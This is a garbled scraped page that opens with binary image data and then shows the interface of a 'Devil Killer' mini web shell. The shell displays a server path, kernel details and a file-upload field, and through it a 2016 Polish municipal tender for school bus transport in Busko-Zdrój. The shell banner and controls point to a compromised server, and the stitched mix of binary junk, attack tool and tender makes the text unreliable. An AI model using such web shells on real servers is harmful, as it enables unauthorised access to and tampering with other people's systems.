JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160622/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20160622/97999-N-2016.html

<p class="kh_header"><b>Busko-Zdrój: Dowóz uczniów do jednostek oświatowych prowadzonych przez Gminę Busko - Zdrój w roku szkolnym 2016/2017</b><br>
<b>Numer ogłoszenia: 97999 - 2016; data zamieszczenia: 22.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta i Gminy , ul. Adama Mickiewicza 10, 28-100 Busko-Zdrój, woj. świętokrzyskie, tel. 041 3705200, faks 041 3705290.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umig.busko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dowóz uczniów do jednostek oświatowych prowadzonych przez Gminę Busko - Zdrój w roku szkolnym 2016/2017.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest: dowóz uczniów do jednostek oświatowych prowadzonych przez Gminę Busko - Zdrój w roku szkolnym 2016/2017.
Gmina planuje realizację dowozu uczniów w roku szkolnym 2016/2017 w formie trzech zadań.
2. Zakres przedmiotu zamówienia:
2.1. Na dowóz uczniów w ciągu jednego dnia składają się dwukrotne przewozy, tzn. dowóz uczniów z miejscowości zamieszkania do jednostek oświatowych oraz odwóz uczniów, po zajęciach lekcyjnych z jednostek oświatowych do miejscowości zamieszkania. 
2.2. Dowóz uczniów prowadzony jest przez wszystkie dni, w których prowadzone są zajęcia lekcyjne w jednostkach oświatowych.
2.3. Wykonawca ustala z dyrektorami jednostek oświatowych minutowe rozkłady jazdy na poszczególnych trasach dowozu, a następnie zatwierdzone przez dyrektorów rozkłady przedkłada Gminie przed rozpoczęciem dowozu, tj. przed 1 września 2016 r.
2.4. Wykonawca zapewnia przewożonym uczniom opiekę i bezpieczeństwo. 
ZADANIA
ZADANIE I: dowóz uczniów w Okręgu I do następujących jednostek oświatowych: Zespół Placówek Oświatowych w Szańcu, Samorządowe Gimnazjum w Podgajach, Szkoła Podstawowa w Kołaczkowicach. 
Trasy:
nr 1/I: Galów - Mikułowice - Szaniec - Podgaje,
nr 2/I: Skorzów - Młyny - Podgaje,
nr 3/I: Balice - Kołaczkowice - Podgaje,
nr 4/I: Widuchowa - Podgaje - Kołaczkowice,
nr 5/I: Grabda I - Kołaczkowice - Podgaje,
nr 6/I: Młyny - Mikułowice - Skorzów.
Łączną dzienną długość dowozu w Okręgu I szacuje się na 326,9 km, roczną długość przejazdów w Okręgu I szacuje się na 62 437,90 km.
Do obsługi tras w Okręgu I potrzeba 6 autobusów (2 autobusy dla 56 osób każdy, 4 autobusy dla min. 33 osób każdy). 
ZADANIE II: dowóz uczniów w Okręgu II do następujących jednostek oświatowych: Zespół Placówek Oświatowych w Zbludowicach, Szkoły Podstawowe w: Dobrowodzie i Siesławicach.
Trasy:
nr 1/II: Żerniki Górne - Busko-Zdrój - Zbludowice,
nr 2/II: Szczaworyż - Skotniki Małe - Zbludowice,
nr 3/II: Wolica - Zbludowice,
nr 4/II: Baranów - Dobrowoda,
nr 5/II: Dobrowoda - Zbludowice,
nr 6/II: Las Winiarski - Szaniec - Busko-Zdrój - Zbludowice,
nr 7/II: Kostki Małe - Zbludowice,
nr 8/II: Chotelek - Siesławice - Zbludowice. 
Łączną dzienną długość dowozu w Okręgu II szacuje się na: 336,0 km, roczną długość przejazdów w Okręgu I szacuje się na 64 176,00 km.
Do obsługi tras w Okręgu II potrzeba 8 autobusów (4 autobusy dla 56 osób każdy, 1 autobus dla 52 osób, 1 autobus dla 49 osób, 2 autobus dla 42 osób każdy).
ZADANIE III: dowóz uczniów w Okręgu III do następujących jednostek oświatowych: Zespół Placówek Oświatowych Nr 1 w Busku - Zdroju, Samorządowe Gimnazjum Nr 1 w Busku - Zdroju, Szkoły Podstawowe Nr 2 i Nr 3 w Busku - Zdroju. 
Trasy:
nr 1/III: N. Folwark - Mikułowice - Busko-Zdrój,
nr 2/III: Widuchowa - Owczary - Łagiewniki - Busko-Zdrój,
nr 3/III: Wełecz - Busko - Zdrój,
nr 4/III: Wełecz - Busko - Zdrój, ul. Rehabilitacyjna.
Łączną dzienną długość dowozu w Okręgu III szacuje się na: 138,00 km, roczną długość przejazdów w Okręgu III szacuje się na 26 358,00 km.
Do obsługi tras w Okręgu III potrzeba 3 autobusy (3 autobusy dla 56 osób każdy oraz jeden pojazd do przewozu 4 - 5 uczniów niepełnosprawnych).
Dodatkowe informacje:
1) każdy z Wykonawców może złożyć odrębną ofertę na wykonanie każdego z trzech zadań dowozu; na realizację każdego z zadań dowozu będzie zawierana odrębna umowa; 
2) Zamawiający nie dopuszcza składania ofert częściowych odrębnie na poszczególne trasy dowozu,
3) łączną szacunkową ilość dni dowozu w roku szkolnym 2016/2017 określa zał. nr 6 do SIWZ.
2.5. Dodatkowe zasady i warunki prawidłowej realizacji zamówienia:
1) każda trasa ma być obsługiwana osobnym autobusem,
2) w przypadku awarii autobusu prowadzącego dowóz Wykonawca ma obowiązek natychmiastowego (maksymalnie w ciągu 25 minut) podstawienia sprawnego autobusu zastępczego;
Wykonawca musi dysponować dodatkowymi autobusami w rejonie dowozu, które w każdej chwili może wykorzystać, jako zastępcze; 
niedopuszczalna jest sytuacja, w której uczniowie na jednej trasie, z powodu awarii autobusu, będą oczekiwać na autobus z innej trasy, tak długo, aż wykona on dowóz na swojej trasie i dopiero przyjedzie po oczekujących; 
uwaga: niespełnienie powyższego warunku będzie skutkowało natychmiastowym zerwaniem umowy na dowóz w danym okręgu, w którym Wykonawca świadczy usługę,
3) wszyscy przewożeni uczniowie obowiązkowo muszą mieć zapewnione miejsca siedzące w autobusach,
4) ilość i rodzaj tras może ulec zmianie w przypadku następujących okoliczności zaistniałych w trakcie okresu trwania dowozu:
a) zmiana sieci jednostek oświatowych,
b) reorganizacja jednostek oświatowych,
c) reorganizacji czasu zajęć lekcyjnych w jednostkach, 
d) zmiana liczby dowożonych uczniów;
w takiej sytuacji sporządza się nową (lub dodatkową - zadanie uzupełniające) umowę, z zachowaniem ustalonego w trybie przetargu kosztu 1 km dowozu;
5) Wykonawcę obowiązują zasady określone w Regulaminie dowozu uczniów do szkół podstawowych, gimnazjów i przedszkoli prowadzonych przez Gminę Busko - Zdrój,
6) Wykonawca we własnym zakresie współpracuje z zakładami odpowiedzialnymi za utrzymanie przejezdności dróg na trasach dowozu w sprawach przejezdności i bezpiecznego stanu dróg, po których prowadzą trasy dowozu (zwłaszcza w okresie zimowym),
7) wszelkie zmiany i utrudnienia wynikłe w trakcie realizacji zadania na trasach poszczególnych okręgów dowozu Wykonawca ma obowiązek zgłaszać do Gminy,
8) Wykonawca zapewnia opiekę i bezpieczeństwo dowożonym uczniom, 
9) harmonogram  dowozu uczniów do jednostek oświatowych prowadzonych przez Gminę Busko - Zdrój w roku szkolnym 2016/2017 stanowi załącznik nr 5 do SIWZ.
2.6. Wykonawca ma możliwość i obowiązek sprawdzenia długości tras wyszczególnionych w dz. III, ust. 1 niniejszego SIWZ. Ewentualne uwagi czy zastrzeżenia Wykonawca może zgłaszać Gminie do czasu złożenia oferty przetargowej. 
Uwaga: roszczenia i wnioski dot. długości tras, które zostaną złożone po rozstrzygnięciu przetargu nie będą uwzględniane.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w  art. 67 ust. 1 pkt 6 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, tekst jednolity (Dz. U. z 2015 r. poz. 2164) w wysokości do 50% wartości zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium w niniejszym postępowaniu</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli Wykonawca na jego potwierdzenie złoży licencję na wykonywanie transportu drogowego osób wydaną na podstawie ustawy z dnia 6 września 2001 r. o transporcie drogowym</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli Wykonawca wykaże wykonanie w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 2usług  polegających na przewozie uczniów 
wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane należycie.
Zamawiający za przewóz uczniów rozumie przejazd na kolonie, zielone szkoły, wycieczki szkolne oraz również cykliczny dowóz uczniów do szkół itp</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli Wykonawca wykaże, że przy realizacji zamówienia będzie dysponował:
Dla ZADANIA I:
Niżej wymienionym sprzętem:
- Min.  6 autobusów, w tym:  min. 2 autobusy dla min. 56 osób każdy, min.  4 autobusy dla min. 33 osób każdy 
wraz z podaniem informacji o podstawie dysponowania wymienionym sprzętem.
Dla ZADANIA II:
Niżej wymienionym sprzętem:
- Min. 8 autobusów, w tym:  min. 4 autobusy dla min. 56 osób każdy, min. 1 autobus dla min.  52 osób, min. 1 autobus dla min. 49 osób, min. 2 autobus dla min. 42 osób każdy).
wraz z podaniem informacji o podstawie dysponowania wymienionym sprzętem.
Dla ZADANIA III:
Niżej wymienionym sprzętem:
- Min.  3 autobusy dla min. 56 osób każdy,
- Min.  1 pojazd do przewozu 4 - 5 uczniów niepełnosprawnych
wraz z podaniem informacji o podstawie dysponowania wymienionym sprzętem.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli Wykonawca wykaże, że przy realizacji zamówienia będzie dysponował:
Dla ZADANIA I:
Osobami:
- Min.   liczbą 6  kierowców, posiadających uprawnienia do prowadzenia autobusów, wymagane ustawą z dnia 20.06.1997 r. Prawo o ruchu drogowym (t.j. Dz. U. z 2012 r., poz. 1137 z późn. zm.).
wraz z oświadczeniem, że osoby te posiadają wymagane uprawnienia.
Dla ZADANIA II:
Osobami:
- Min.   liczbą 8  kierowców, posiadających uprawnienia do prowadzenia autobusów, wymagane ustawą z dnia 20.06.1997 r. Prawo o ruchu drogo-wym (t.j. Dz. U. z 2012 r., poz. 1137 z późn. zm.).
wraz z oświadczeniem, że osoby te posiadają wymagane uprawnienia.
Dla ZADANIA III:
Osobami:
- Min.   liczbą 4 kierowców, posiadających uprawnienia do prowadzenia autobusów, wymagane ustawą z dnia 20.06.1997 r. Prawo o ruchu drogo-wym (t.j. Dz. U. z 2012 r., poz. 1137 z późn. zm.).
wraz z oświadczeniem, że osoby te posiadają wymagane uprawnienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca będzie znajdować się w sytuacji ekonomicznej i finansowej zapewniające wykonanie niniejszego zamówienia. W szczególności Wykonawca musi spełniać następujące warunki: 
1. przedstawi opłaconą polisę, a w przypadku jej braku - inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 70 000,00 zł (dla realizacji każdego z zadań),
2. posiada środki finansowe lub zdolność kredytową w wysokości minimum 50 000,00 zł (dla realizacji każdego z zadań)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony formularz ofertowy z wykorzystaniem wzoru wg Załącznika 1;
2. Pisemne zobowiązanie innych podmiotów, o których mowa w art. 26 ust. 2b Pzp, do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia, w przypadku, gdy Wykonawca będzie polegał na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych tych podmiotów</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - Czas podstawienia autobusu w przypadku awarii - 2</li>
</ul>
